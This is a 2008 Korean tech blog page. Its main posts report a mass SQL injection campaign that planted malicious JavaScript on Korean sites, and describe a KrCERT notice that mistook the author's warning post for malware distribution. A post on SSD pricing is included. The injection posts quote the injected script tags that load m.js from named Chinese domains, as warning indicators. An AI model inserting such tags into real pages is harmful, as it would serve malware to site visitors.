[2008-06-30] ITViewpoint.com 독자, 방문객 여러분께 66 8
[2008-04-21] 콘텐츠 사용공지 - 비상업적 용도 전문복제 허용 1
May 13
신종 해킹 경고했더니, 악성코드 배포처로 오인받다
포인트:10605point (97%), 레벨:10/30떡이떡이
16:04:26
2622
2
人터넷에서 놀자
http://itviewpoint.com/58068

cap.jpg

제가 약 1시 반 경에 아래와 같은 포스팅을 통해 악성코드 해킹을 경고한 바 있습니다.

모 포털, 대규모 SQL 인젝션 공격에 당한 흔적?
- http://itviewpoint.com/58004

그런데 약 20분 전 한국정보보호진흥원에서 갑자기 제 사이트가 신종 악성코드를 배포하고 있다는 통지를 해 왔습니다.
이게 뭔 소리..

당황스러운 내용을 담고 있어 상황실과 통화했더니, 역시나였습니다.
제 글에 있는 '코드 내용 설명' 부분을 잘못 파악해 악성코드로 오인한 겁니다.

즉 오늘 상황 순으로 설명해 드리면. (1) 오전에 모 포털 등 주요 사이트 SQL 인젝션 공격으로 신종 악성코드 또 감염 제보 (2) 오후 1시 반경 관련 속보를 블로그에 글 올림 (3) 구글 검색엔진 등 인터넷에 제 글 노출 (4) 정보보호진흥원, 현재 감시중인 악성코드 문자열을 제 블그에서 발견, e메일 경고 전송 (5) 상황실과 직접 통화 결과 악성코드가 아니라 악성코드 소개 문자열을 오인한 것으로 확인.
 
아래는 정보보호진흥원 e메일 통지사항입니다. 어찌됐건 정보보호진흥원의 발빠른 실시간 대응이 돋보이네요. 지금 m.js 자바스크립트가 핫 이슈로 난리난 모양이니, 각 웹사이트 운영자들께서는 동일한 공격을 받지 않도록 각별히 주의하시기 바랍니다.

자, 0.js 1.js fuckjp.js에 이어 m.js 까지... 다음에는 무슨 자바스크립트 파일명이 될지 궁금해집니다.

귀사의 발전을 기원합니다. 한국정보보호진흥원 인터넷침해사고대응지원센터(http://www.krcert.or.kr) 종합상황실입니다.

우리원은 민간분야 인터넷침해사고(해킹, 웜.바이러스 등) 예방 및 대응활동 등을 수행하고 있습니다.
※ 근거법령: 정보통신망이용촉진및정보보호등에관한법률 제48조의2(침해사고의 대응 등)

아래 귀사의 홈페이지가 해킹을 당한 후 악성코드가 은닉된 채 방치되어, 홈페이지를 방문하는 인터넷 이용자에게 악성코드 감염 및 개인 정보 유출 등 피해를 주고 있는 것으로 확인되었습니다.  이에 다음과 같이 신속한 대응 조치를 요청하오니 적극 협조하여 주시기 바랍니다.

---------------------------------------------------------------------------------------

서명덕 기자의 인터넷세상 홈페이지에서 악성코드로 의심되는 코드를 다운로드하고 있습니다.
(http://www.itviewpoint.com/)

 o 의심되는 코드 다운로드 URL : 
      - http://www.kisswow.com.cn/m.js
      - http://www.wowgm1.cn/m.js
      - http://www.wowyeye.cn/m.js
 
해당 코드를 삭제하시고 해킹피해 원인파악, 보안패치, 웹 방화벽 적용 등 아래 권고사항을 참고하셔서 재발방지대책을 강구하여 주시기 바랍니다.

※ 근본적인 원인파악 없이, 의심스러운 악성코드만 삭제하는 것은 긴급조치일 뿐 큰 의미가 없습니다.

   대부분 해커는 이미 해킹한 홈페이지의 보안상 허점(취약점)을 알고 있으며,
   한번 해킹한 서버는 다음에 좀 더 쉽게 침투하기 위한 백도어를 설치하여
   언제라도 악성코드를 다시 올려놓을 수 있기 때문입니다.

----------------------------------------

< 웹해킹 방어를 위한 KrCERT/CC 권고 사항>

※ 공개웹방화벽 전용 홈페이지 안내(방화벽 설치 시 주요 웹해킹 방어가능)

 o 공개웹방화벽(WebKnight 및 ModSecurity) 다운로드, 설치 운영 가이드, FAQ 등의 정보 제공
   - http://www.krcert.or.kr/firewall/index.htm

※ 무료 웹취약점 점검을 신청(정보보호 인력이 부족한 중소기업 또는 소규모 비영리 단체를 대상으로 서비스 제공)

 o 무료 홈페이지 취약점 점검서비스 신청하러가기
   - http://webcheck.krcert.or.kr 

※ 아래의 문서를 참조하여 해킹에 대응하시기 바랍니다.

 o 홈페이지 개발 보안 가이드
   - http://www.kisa.or.kr/trace_log/homepage_guide_down.jsp 

 o 웹 보안 4종 가이드 
   - http://www.kisa.or.kr/kisa/notics/popup/2008/popup_200801_websecureguide.html 

 o 침해사고 분석절차 가이드 
   - http://www.krcert.or.kr/docDown.jsp?dn=10 

 o PHP웹 게시판 취약점 관련 사고분석 및 보안대책 
   - http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2005001.pdf&docNo=IN2005001 

 o SQL Injection 취약점을 이용한 윈도우즈 웹서버 사고 사례 
   - http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2005014.pdf&docNo=IN2005014  

 o 웹 해킹을 통한 악성 코드 유포 사이트 사고 사례 
   - http://www.krcert.or.kr/unimDocsDownload.do?fileName1=050629-IN-2005-012.pdf&docNo=IN2005012 

 o ARP Spoofing 기법을 이용한 웹 페이지 악성코드 삽입 사례 
   - http://www.krcert.or.kr/unimDocsDownload.do?fileName1=IN2007003.pdf&docNo=IN2007003&docKind=3 

궁금하신점은 한국정보보호진흥원 상황실(02-405-XXXX~XXXX)로 연락바랍니다.

감사합니다.

이 게시물을..

안녕하세요. 블로거 '떡이떡이' 입니다.

여기, 자주 오실 필요 없어요~
하루에 1분만 보면 돈되는 정보 하나를 얻어갈 수 있는, '정보블로그'를 추구합니다.

많이 얻어가세요! 헐헐헐헐~

Tags

Uploaded Files

엮인글 주소 : http://itviewpoint.com/58068/030/trackback
삭제 수정 답글
2008.05.13 16:53:55
Amberite
이거 웃어야 하나요? 욕을 해야 하나요?

저 분들은 언제나 랩업이 될련지 궁금하네요.
이 댓글을..
삭제 수정 답글
2008.05.14 09:27:41
cw

열심히 자기 일 하시는 분들께 욕은 무슨;;;  기자님이 피해를 본 것도 아니고 위험 경고 메일을 받은건데. 오히려 누군가 저런 일을 하고 있다는 점에서 대한민국 인터넷 보안이 예전보다는 레벨업이 되었다는 생각이 드네요..

그나저나 저건 자동화된 툴로 구글 검사해서 메일을 뿌려주는 걸까요. 아니면 수동으로? ㅎㅎ 어느쪽이든 한국정보보호진흥원에서도 이번 사태를 파악하고 나름의 대응을 하고 있다는 의미이군요.

이 댓글을..
글자를 진하게 합니다 글자를 기울이게 합니다 밑줄을 긋습니다 취소선을 긋습니다 글자의 색상을 지정합니다 글자의 배경색상을 지정합니다
왼쪽 정렬을 합니다 가운데 정렬을 합니다 오른쪽 정렬을 합니다 좌우 폭에 맞게 정렬을 합니다
들여쓰기를 제거합니다 들여쓰기를 합니다
기호로된 목록을 적용합니다 숫자로된 목록을 적용합니다
이모티콘 출력 기본 이미지 갤러리 이미지 추가 멀티미디어 자료 관리 설문조사 컴포넌트 인용구 작성 표(table) 생성 링크 생성
배경, 글자, 이미지, 인용문등에서 더블클릭을 하시면 상세한 컴포넌트 설정이 가능합니다 close
preview
파일 첨부 선택 삭제 본문 삽입
문서 첨부 제한 : 0Byte/ 2.00MB
파일 제한 크기 : 2.00MB (허용 확장자 : *.*)
May 13
엠트론이 SSD 값 내리기 위해 '도시바'를 선택하다
포인트:10605point (97%), 레벨:10/30떡이떡이
14:19:23
2351
2
얼리어답터
http://itviewpoint.com/58035

mtron.jpg

도시바와 협력 관계를 맺은 엠트론이 SSD의 값을 내리기 위해 도시바 MLC 제품을 들여올 모양입니다. 엠트론은 공식 자료에서 "60만원 대(32GB 기준)인 SLC 기반 Mtron SSD 제품보다 약 50% 정도 가격을 낮춰 판매할 계획이다"이라고 설명하고 있습니다. 대충 30만원 정도가 되는 셈이죠. 이미 MLC 제품을 출시한 상황에서는 새로운 소식은 아닙니다. 다만 그 반도체 셀이 삼성에서 도시바로 바뀐 다는 점은 매우 흥미롭습니다. 

엠트론이 그 동안 삼성 제품을 사용해 왔고, MLC 역시 이미 출시한 바 있지만 아무래도 MLC를 국내에서 수급하기 여러웠던 모양입니다. 안정적으로 공급받기 위한 선택인 것 같습니다.

그 동안 말 뿐이었던 상황이었지만, 이제는 진짜 싼 제품이 나올 셈인가요.

아래는 과거 관련 글들입니다.

아는 사람들은 다 알 만한 최근 'SSD' 이야기
http://itviewpoint.com/46412

60만원대 32GB(SLC) SSD의 성능은 이정도다
http://itviewpoint.com/44502

MLC로 32GB SSD가 20만원대 후반이라면!!!
http://itviewpoint.com/45267

----------------------

[5월 13일자 보도자료 전문]
엠트론, 도시바 멀티레벨셀(MLC)로 보급형 SSD 판매 본격화
도시바와의 협력을 바탕으로 B2B 시장 적극 공략 예정

SSD 전문기업인 ㈜엠트론스토리지테크놀로지(이하 ‘엠트론’, 대표 전형관, 조용석)는 오는 5월 말부터 도시바 멀티레벨셀(MLC)을 기반으로 한 Mtron SSD MOBI 1000 시리즈를 출시한다고 밝혔다. 멀티레벨셀(MLC) 기반 SSD는 기존에 사용해온 싱글레벨셀(SLC)보다 셀 당 저장능력이 크고 생산비용이 낮기 때문에 그 동안 SSD 보급화에 걸림돌로 작용했던 가격과 용량 부분에서 상당 부분 개선될 것으로 본다. 엠트론은 “갈수록 치열해지고 있는 SSD 시장에서 보급형 SSD를 출시하면서 세계 시장에서의 높은 점유율을 확보할 것”이라고 강한 포부를 드러냈다.

이번 MOBI 1000 시리즈는 엠트론의 독자적인 고성능 콘트롤러 기술을 바탕으로 최대 읽기 속도 100MB/s, 최대 쓰기 속도 40MB/s의 성능을 보인다. 읽기 성능은 MOBI 3000 시리즈(SLC 기반 SSD)와 동일한 성능을 유지하면서 60만원 대(32GB 기준)인 기존 Mtron SSD 제품보다 약 50% 정도 가격을 낮춰 판매할 계획이다. 또한 32Gbit MLC 메모리 칩을 사용하여 용량은 32, 64GB까지, 폼팩터는 2.5인치와 1.8인치, 두 종류로 생산될 예정이다.

엠트론의 한종철 이사는 “SSD가 본격적으로 실용화되기 위해서는 무엇보다 HDD와의 가격 격차를 줄이는 게 중요한데, MLC 메모리 칩을 도입함으로써 올 하반기를 기점으로 HDD와의 가격 격차를 좁히고 노트북 등 모바일PC에서 MLC 기반 SSD의 채용이 대폭 늘어나면서 SSD 보급화가 가속화될 것이다”고 전망했다.

또한 “엠트론은 SSD 제품 라인업을 강화하면서 기존에 판매되고 있는 SLC 기반 Mtron SSD 는 서버 및 스토리지, 워크스테이션 등과 같은 엔터프라이즈급 시장 공략에 주력, MLC 기반 제품은 모바일PC 등 소비자 시장에 치중할 것”이라고 강조했다.

한편, 엠트론은 지난 4월 15일, 도시바와 플래시메모리 공급 및 투자와 관련하여 협력관계를 맺기로 양해각서(MOU)를 체결했다. 이로써 엠트론은 SSD 사업에서 가장 중요한 부분인 플래시메모리 공급선을 다양화하며 앞으로 멀티레벨셀(MLC) 플래시메모리를 안정적으로 공급받을 수 있는 길을 확보했다.

시장조사 기관 웹피트 리서치(2008,1Q)에 따르면 SSD 전체 시장 규모가 올해는 21억9천8백만 달러, 2012년에는 117억 달러 이상을 넘어설 것으로 전망하고 있다.

** 참고 자료 : 싱글레벨셀(SLC)와 멀티레벨셀(MLC)의 차이점

SLC(Single level cell)는 0, 1 상태를 저장하는 방식이다. 즉, 하나의 공간에 2가지 정보를 저장할 수 있다. MLC(Multi level cell)는 00, 01, 10, 11 4가지 상태를 저장한다. 즉, 하나의 공간에 4가지 정보를 저장할 수 있다.

s_1.JPG

따라서 동일한 공간으로 놓고 보면 SLC에 비해 MLC가 2배 더 많은 데이터를 저장할 수 있어 동일한 반도체 웨이퍼에서 만들어낼 수 있는 용량이 더욱더 커 SLC에 비해 MLC의 가격이 훨씬 저렴하다. 하지만, SLC는 한 공간을 채우거나 비우는 동작으로 데이터를 기록할 수 있지만, MLC는 몇 개 데이터를 채웠느냐를 봐야 하므로 SLC에 비해 상대적으로 속도가 느리다.

m_1.JPG

MLC 경우, 일반적으로 데이터 읽기 속도가 SLC에 비해 30%, 쓰기 속도는 75% 떨어지며 프로그램이나 삭제 속도는 SLC의 1/10 수준에 불과하다. 전체적인 성능에서 MLC는 SLC보다 60% 정도 떨어지는 것으로 알려져 있다. 하지만 MLC는 기존의 SLC보다 칩 사이즈를 35% 줄이면서 생산비용은 40% 절감할 수 있으며 생산 비용을 절감할 수 있다 보니 제품 가격도 낮출 수 있다.

이 게시물을..

안녕하세요. 블로거 '떡이떡이' 입니다.

여기, 자주 오실 필요 없어요~
하루에 1분만 보면 돈되는 정보 하나를 얻어갈 수 있는, '정보블로그'를 추구합니다.

많이 얻어가세요! 헐헐헐헐~

Tags

Uploaded Files

엮인글 주소 : http://itviewpoint.com/58035/b75/trackback
삭제 수정 답글
2008.05.13 19:34:40
Chan
다만 그 반도체 셀이 도시바에서 삼성으로 바뀐 다는 점은 매우 흥미롭습니다. 
다만 그 반도체 셀이 삼성에서 도시바로 바뀐 다는 점은 매우 흥미롭습니다. 이 아닐까 합니다. ^_^
이 댓글을..
답글
2008.05.14 09:18:30
포인트:10605point (97%), 레벨:10/30떡이떡이
오옷 그렇군요. 수정해야겠습니다.
이 댓글을..
글자를 진하게 합니다 글자를 기울이게 합니다 밑줄을 긋습니다 취소선을 긋습니다 글자의 색상을 지정합니다 글자의 배경색상을 지정합니다
왼쪽 정렬을 합니다 가운데 정렬을 합니다 오른쪽 정렬을 합니다 좌우 폭에 맞게 정렬을 합니다
들여쓰기를 제거합니다 들여쓰기를 합니다
기호로된 목록을 적용합니다 숫자로된 목록을 적용합니다
이모티콘 출력 기본 이미지 갤러리 이미지 추가 멀티미디어 자료 관리 설문조사 컴포넌트 인용구 작성 표(table) 생성 링크 생성
배경, 글자, 이미지, 인용문등에서 더블클릭을 하시면 상세한 컴포넌트 설정이 가능합니다 close
preview
파일 첨부 선택 삭제 본문 삽입
문서 첨부 제한 : 0Byte/ 2.00MB
파일 제한 크기 : 2.00MB (허용 확장자 : *.*)
May 13
모 포털, 대규모 SQL 인젝션 공격에 당한 흔적?
포인트:10605point (97%), 레벨:10/30떡이떡이
13:17:41
2547
0
人터넷에서 놀자
http://itviewpoint.com/58004

hack.jpg


국내 모 포털 일부 섹션이 SQL인젝션 공격으로 악성 자바스크립트가 무차별 삽입되는 공격을 당했다는 주장이 담긴 제보가 전문가로부터 또 다시 날아왔습니다.

현재 구글에서는 해당 포털의 악성코드가 확인이 안됩니다만, 이 분의 주장에 따르면 포털 웹페이지에서 확인이 가능하다고 합니다.


대형 포털 섹션 XXX에 들어가면 http://www.wowgm1.cn/m.js (클릭 금지) 이라는 페이지를 호출합니다. 이 페이지는 해당주소/0700*.htm 등 여러 htm 문서를 또 호출합니다.

호출되는 페이지의 내용은

This is a mass invasion. Safeguard the motherland's dignity! FUCK FRANCE! FUCK CNN! I WILL ATTACK you ALWAYS ! I love my motherland! sorry Please understand that I IF YOU WANT TO SAY SOMETHING . PLEASE SEND EMAIL TO kiss117276@163.com

입니다. 다른 페이지 감염 여부는 확인하지 못했습니다. <주요 실명 표현 삭제>

이는 제가 단독 분석한 앞선 기사의 연장선상에서 공격으로 파악됩니다.

UN-英정부도 한때 뚫렸다…개발코드 허점 때문
http://www.itviewpoint.com/56425

경찰서·지자체까지…그들은 해킹에 무기력했다
http://www.itviewpoint.com/56766

이 글에서 저는 <script src=nihaorr1.com/1.js></script> 형태의 DB 강제삽입 공격에 대해 소개한 바 있습니다. 당시 알려진 도메인은 nihaorr1.com , haoliuliang.net , 2117.net , 2117966.net 이었고, 악성코드 자바스크립트명은 0.js 1.js fuckjp.js 등이었습니다. 이에 미뤄 볼 때 동일한 공격 형태로 m.js를 뿌리는 것으로 보입니다.

제가 추가 취재해 본 결과

<script src=http://www.wowgm1.cn/m.js></script>
<script src=http://www.wowyeye.cn/m.js></script>
<script src=http://www.kisswow.com.cn/m.js></script>

등이 악성 코드로 뿌려진 상태입니다. 방송사부터 지방 단체까지 상당수가 이미 감염 됐다는 흔적이 보입니다.

관계 당국의 긴급 조치가 필요한 시점입니다.

이 게시물을..